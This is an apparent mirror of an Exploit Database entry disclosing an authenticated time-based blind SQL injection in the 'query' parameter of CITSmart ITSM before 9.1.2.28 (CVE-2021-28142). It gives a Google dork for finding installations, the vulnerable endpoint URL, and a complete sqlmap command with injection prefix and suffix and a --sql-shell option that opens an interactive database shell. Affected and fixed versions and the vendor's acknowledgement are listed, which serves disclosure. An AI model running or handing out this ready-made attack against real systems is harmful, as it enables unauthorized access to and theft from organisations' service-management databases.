CITSmart ITSM 9.1.2.27 – ‘query’ Time-based Blind SQL Injection (Authenticated)

• Exploit Database
• 20 阅读

• 作者： skysbsb
  日期： 2021-04-14
• 类别：

  • webapps
  平台：

  • java
• 来源：https://www.exploit-db.com/exploits/49763/

• # Exploit Title: CITSmart ITSM 9.1.2.27 - 'query' Time-based Blind SQL Injection (Authenticated)
  # Google Dork: "citsmart.local"
  # Date: 11/03/2021
  # Exploit Author: skysbsb
  # Vendor Homepage: https://docs.citsmart.com/pt-br/citsmart-platform-9/get-started/about-citsmart/release-notes.html
  # Version: < 9.1.2.28
  # CVE : CVE-2021-28142
  
  To exploit this flaw it is necessary to be authenticated.
  
  URL vulnerable:
  https://vulnsite.com/citsmart/pages/smartPortal/pages/autoCompletePortal/autoCompletePortal.load?idPortfolio=&idServico=&query=fale
  Param vulnerable: query
  
  Sqlmap usage:sqlmap -u "
  https://vulnsite.com/citsmart/pages/smartPortal/pages/autoCompletePortal/autoCompletePortal.load?idPortfolio=&idServico=&query=fale" --cookie 'JSESSIONID=xxx' --time-sec 1 --prefix "')" --suffix "AND ('abc%'='abc" --sql-shell
  
  Affected versions: < 9.1.2.28
  Fixed versions: >= 9.1.2.28
  
  Vendor has acknowledge this vulnerability at ticket 11216 (https://docs.citsmart.com/pt-br/citsmart-platform-9/get-started/about-citsmart/release-notes.html)